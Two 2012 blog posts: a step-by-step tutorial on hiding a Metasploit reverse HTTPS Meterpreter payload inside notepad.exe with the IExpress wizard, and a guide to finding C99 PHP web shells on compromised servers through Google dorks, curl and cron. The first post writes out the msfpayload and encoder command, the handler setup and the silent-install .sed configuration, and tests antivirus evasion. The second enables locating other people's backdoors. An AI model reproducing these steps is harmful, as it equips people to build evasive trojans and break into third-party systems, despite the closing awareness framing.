06/04/2012

Knock Knock Who is There?

Intro

This article was posted to show you how ridiculously easy is to back door any executable of your choice (well almost any) without even knowing how to pronounce the word CoMpUtEr. I call this constructive hacking because you literally construct the Trojan Horse using windows embedded packers without knowing how to program in any programming language, and the best part is that it is not even traceable from almost all if any anti virus software that exist in the market.

The magical wizard

When I say magical wizard I am referring to the IExpress wizard (obviously very well know to the hacking community for a long time now). IExpress wizard exist in almost all windows versions with default installation. You can use the IExpress Wizard and it's command-line options that come with Windows XP, Windows Server 2003, and Windows Vista to simplify the creation of a setup program. Using the IExpress Wizard, you can create self-extracting files that automatically run the setup program that is contained inside. The setup program can be an .inf file or an executable program. IExpress automatically removes the setup files after installation.

Now what is suspicious about that? Of course the fact that you can pack other executable within any of the executable you choose to. The IExpress Wizard can help you carry out installations of your customized browser package, such as determining whether the computer needs to be restarted after installation. You can find the IExpress Wizard (IExpress.exe) in the <systemdrive>:\WINDOWS\system32 folder.

IExpress uses a Self-Extraction Directive (.sed) file to store information about your package. When you run the IExpress Wizard, you can start with an existing .sed file or create a new one by using the wizard. The .sed file contains information and instructions about the setup package.

Running the wizard

A very easy way to start IExpress wizard is by Start --> Run and then type IExpress. If you do that the IExpress wizard window is going to pop up and ask you to follow a flow of next button clicking instructions to achieve your goal. 



Step 1:Running IExpress wizard window looks exactly like that:


Step 2: The following window that appears is this one:

 
Note: Notice that I have marked the software version and clicked on the Create new Self Extraction Directive option, which is the one we are going to use for the purpose of this tutorial.

Step 3: The next step will be to click next and get the next wizard window:
    


Note: This this window we choose Extract file and run an installation command, very important option for our success.

Step 4: And again you can see that the next window asks for a the package title (I choose Evil Notepad):


Step 5: In this part we want a none interactive installation and for that reason I choose No prompt and click to next button:



Step 6: Again we want a none interactive installation (for reducing the user interaction) and for that reason I choose Do not display a license and click to next button:


Step 7: In the following window we can add the executable we want to back door:



We will now stop the process with our wizard and locate the notepad executable which by the way is located in this path %SystemRoot%\system32 notepad.exe we copy the executable to the desired location in order to insert it.


The notepad.exe before our back door

For this tutorial (as already mentioned) we will use the notepad.exe to do the demo. Meaning we will back door the notepad executable and explain how to run it (meaning how to the fool the victim user to install it or simply run the infected executable). But first lets have a look at the properties of the executable we are infecting:


Note: Check the Size property of the file, it is 147 KB. Obviously the size of the notepad.exe after inserting the Trojan executable is going to be increased (or maybe not?).

Generating our Metasploit payload

There is a relatively large amount of tutorials in the internet on how to generate the desired payload using msfpayload utility and an even larger amount of tutorials on how to bypass industry anti virus software. Now according to my opinion the best malicious payload to generate using Metasploit is Windows version of reverse Https Meterpreter shell (meaning of course windows/meterpreter/reverse_https). Reverse Https payloads after being executed establish a reverse HTTPS connection back to attacker's PC (obviously in port 443).

More specificaly reverse Https shell from Metasploit tunnel communication over HTTP using SSL and Inject the meterpreter server DLL via the Reflective Dll Injection payload (which of course is staged).
  
Step 8: We are now going to use msfpayload to generate out desired executable. We cd to /pentest/exploits/framework2 in backtrack and then type ./msfpayload windows/windows/meterpreter/reverse_https LHOST=192.168.1.2 LPORT=443 R| msfencode -t exe -e x86/shikata_ga_nai >> ClickOnMe.exe (I also used an shikata_ga_nai encoding but it is not needed). Boom the executable was generated (named ClickOnMe.exe of course).

The following screen shot shows the options for the specific payload:


The following screen shot shows the generated executable for the specific payload:


If we do now a file ClickMe.exe we will see that is a DOS executable: 



Step 9: Then we start our handler to the attacking PC and insert the executable from our PC to the notepad. So we type:
  1. cd /pentest/exploits/framework3
  2. ./msfconsole  
  3. msf > use exploit/multi/handler
  4. msf exploit(handler)> set PAYLOAD windows/meterpreter/reverse_https
  5. msf exploit(handler)> set LHOST sameIPfromBefore
  6. msf exploit(handler)> set LPORT 443
  7. msf exploit(handler)> exploit -j
Now a handeler is running in the victims PC is listening in port 443 for reverse Https payload. The executable payload is already created so the next step would be to insert the executable to our notepad. 

Inserting the executable into Notepad.exe

Step 10: We now continue from step 7 (having done already step 8 and 9 of course), the wizard waits to add the executable so we add using the button Add:


Note: As you can see both executable files are now added to the packer.

Step 11: The next step would be to install the notepad.exe (in this occasion notepad obviously does not need to be installed) and then execute the ClickOnMe.exe afterward:


Note: In the install program we put notepad.exe and post install we use the Trojan ClickMe.exe.


Note: In the install program we put notepad.exe and post install we use the Trojan ClickMe.exe.



Note: In order to achive a silent installation we choose to use the No message.


Note: Again we choose to save the EvilNotepad.exe to a specific file.





Note: The screen shots above show a series of next clicking to create the package.


The task manger above shows the malicious executable EvilNotepad.exe running. If you do now a left click properties you will see that the size of the file is increased!! even though there was a 44% compression of the package. Further investigating the EvilNotepad.exe will make you see that if you use a tcpmon it will record the Trojan payload attempt to connect back to the attackers PC.

The configuration file (ending in sed and named as EvilNotepad.sed) shows the exact configuration exported:

[Version]
Class=IEXPRESS
SEDVersion=3
[Options]
PackagePurpose=InstallApp
ShowInstallProgramWindow=1
HideExtractAnimation=1
UseLongFileName=1
InsideCompressed=0
CAB_FixedSize=0
CAB_ResvCodeSigning=0
RebootMode=N
InstallPrompt=%InstallPrompt%
DisplayLicense=%DisplayLicense%
FinishMessage=%FinishMessage%
TargetName=%TargetName%
FriendlyName=%FriendlyName%
AppLaunched=%AppLaunched%
PostInstallCmd=%PostInstallCmd%
AdminQuietInstCmd=%AdminQuietInstCmd%
UserQuietInstCmd=%UserQuietInstCmd%
SourceFiles=SourceFiles
[Strings]
InstallPrompt=
DisplayLicense=
FinishMessage=
TargetName=C:\Documents and Settings\trojan\EvilNotepad.exe
FriendlyName=Evil Notepad
AppLaunched=notepad.exe
PostInstallCmd=ClickOnMe.exe
AdminQuietInstCmd=
UserQuietInstCmd=
FILE0="notepad.exe"
FILE1="ClickOnMe.exe"
[SourceFiles]
SourceFiles0=C:\Documents and Settings\jerry\Desktop\
[SourceFiles0]
%FILE0%=
%FILE1%=

Testing it for anti-virus

 After generating the payload we and check the properties of the file we see that the size is 193 KB:


Note: Defeating the notepad change can be achieved by doing multiple integrity checks with appropriate software.

Now the next step to do is to upload it in virus total to see what the anti-virus software can do:

  

Note: As  you can see obviously anti-virus such as Symantec and SUPERAntiSpyware did not detect the malicious payload.


Epilog

I just proved you that even a person that has almost no clue about computers can actually generate an effective Trojan horse and obviously steal your credit card or personal data (maybe a jealousy boyfriend). Imagine someone using the same methodology to generate Trojan horses combined with social engineering through facebook or flicker. I hope I helped you understand the risks.


Reference:

  1. http://technet.microsoft.com/en-us/library/dd346760.aspx 
  2. http://dyn.com/dns/ 
  3. http://www.offensive-security.com/metasploit-unleashed/Msfpayload

04/04/2012

PHP Malware C99 Shell

Intro

This post is about identifying web back doors. Recently I made a research about PHP Malware C99 Shell and it seems to be very popular among lots of hacking groups and script kiddies. 

C99 PHP Shell

C99Shell is a very well designed shell that practically lets you do about anything with the server, if you have the proper access rights. Here is a list with more web back doors, the link given is actually a google project and it is not going to be accessible trough corporate web gateways (with mal-ware filtering, URL filtering or Content filtering).

Google Dorks

Now days someone would not even have to hack a web server, the only thing they have to do is google already compromised servers by using Google Dorks and boom already got into the compromised machine. Usually the compromised machines found this way are not so interesting, because something that is valuable is better protected (well not always!) and the google crawlers will spot it after a relatively big amount of time. Which means that when you google a web back door and find one then it is already searched many times before you.

To be more specific  a "Crawler" is a generic term for any program (such as a robot or spider) used to automatically discover and scan websites by following links from one webpage to another. Google's main crawler is called Googlebot. This table lists information about the common Google crawlers you may see in your referrer logs, and how they should be specified in robots.txt, the robots meta tags, and the X-Robots-Tag HTTP directives.

But if you want more fine-grained control, you can get more specific. For example, you might want all your pages to appear in Google Search, but you don't want images in your personal directory or hidden linkes such as web back door to be found and to be crawled. In this case, you can use robots.txt to disallow the user-agent Googlebot-image from crawling the files in your /personal directory (while allowing Googlebot to crawl all files), like this:


User-agent: Googlebot
Disallow:

User-agent: Googlebot-Image
Disallow: /personal

Someone can improve his/her web site crawling performance by simply adding directives for different crawlers, like this:

<meta name="robots" content="nofollow"><meta name="googlebot" content="noindex"> 

The truth is that most of the time the web site is going to crawled and be easily googled no matter what you do , an adversary will even be able to access none linked pages.

Web Back-door Google-Dorks using Google Alerts

Gaining access to web back doors in already compromised machines is easier done than thought. By simply using google alerts you can google all web back doors in the Internet and be notified through your google mail box. The best way to do it is by using the intitle:, intext:, inurl: search engine keywords. For example in order to google !C99madShell you simply type in the search:

  1. intitle:!C99madShell
  2. intext: !C99madShell
  3. inurl:backdor_name.php
Note: If you want to limit the search to your web site you can obviously use the site: keyword. For example you can type intitle:!C99madShell site:www.maiavictim.com boom you will search only your web infrastructure.The following screen shots shows how easy is to automate Web Back Doors searching in a daily bases:
 


The best thing to do in every situation in order to protect yourself from being hacked and not finding out about, is to regularly check you web infrastructure using google alerts. This is also a very good start before you begin a penetration test!! to check for already compromised web infrastructure (I know I am brilliant).


Expand and automate the search using basic scripting


A good thing to do in order to protect yourself from script kiddies is to similarly identify all web back doors that are found in the link mention above (the google project). A very good way to automate the whole process is with scripting!!

So firstly you go to google and insert the intitle:!C99madShell then the google search will return this:

  
If you copy the requested url you will see that it is exactly this one:

https://www.google.co.uk/#hl=en&sugexp=frgbld&gs_nf=1&cp=20&gs_id=4&xhr=t&q=intitle%3A!C99madShell&pf=p&output=search&sclient=psy-ab&oq=intitle:!C99madShell&aq=f&aqi=&aql=&gs_l=&pbx=1&bav=on.2,or.r_gc.r_pw.r_qf.,cf.osb&fp=
f711fce0343c3599&biw=580&bih=425 

Now you can use curl to search using google dorks and save your search results in your hard disk or simply use firefox and save search results by doing a save as. You can do this with curl in your command prompt by typing:

curl -A Mozilla http://www.google.com/search?q=C99madSHell |html2text -width 10000000 | grep "Cached - Similar" | grep www.*.php

The following screen shot show the command (notice the html to text Linux utility I used):  


The outcome of this command will be exactly the one shown below (after all the necessary grep-ing is done of course):


As you can see if you enlarge the picture (by simply clicking on the image) the search and filtering performed using curl is redirected into a file (after being properly greped to obtain only the desirable URL's). The output text file contains the potentially compromised web sites. Of course a manual filtering will have to be done to remove the references into URL's that are not really compromised.

Crontabing Google Searches 

The next best thing to do in order to completely automate the process is to use crontab, a good crontab tutorial is  clickmojo. As you already understand after reading this post you understand how toxic the Internet has become.

Here is how to run a google dork search at 6PM every night:

MAILTO=cron@youusername.youmailprovider.com
00 18 * * * /curl <google-dork to search> > logSearch.txt


Note:  You can grep or sed the obtained data to analyze the results and verify you logged only interesting URL's.

Epilog

Internet the last 2 years has become more and more toxic. Even users with no significant information to expose or online businesses start having a hard time to maintain their blogs or web sites without taking into consideration security seriously. Please feel free to post comments and give me back some feed on how useful you find my posts......

Reference:
  1. http://support.google.com/webmasters/bin/answer.py?hl=en&answer=1061943
  2. http://www.google.com/alerts 
  3. http://clickmojo.com/code/cron-tutorial.html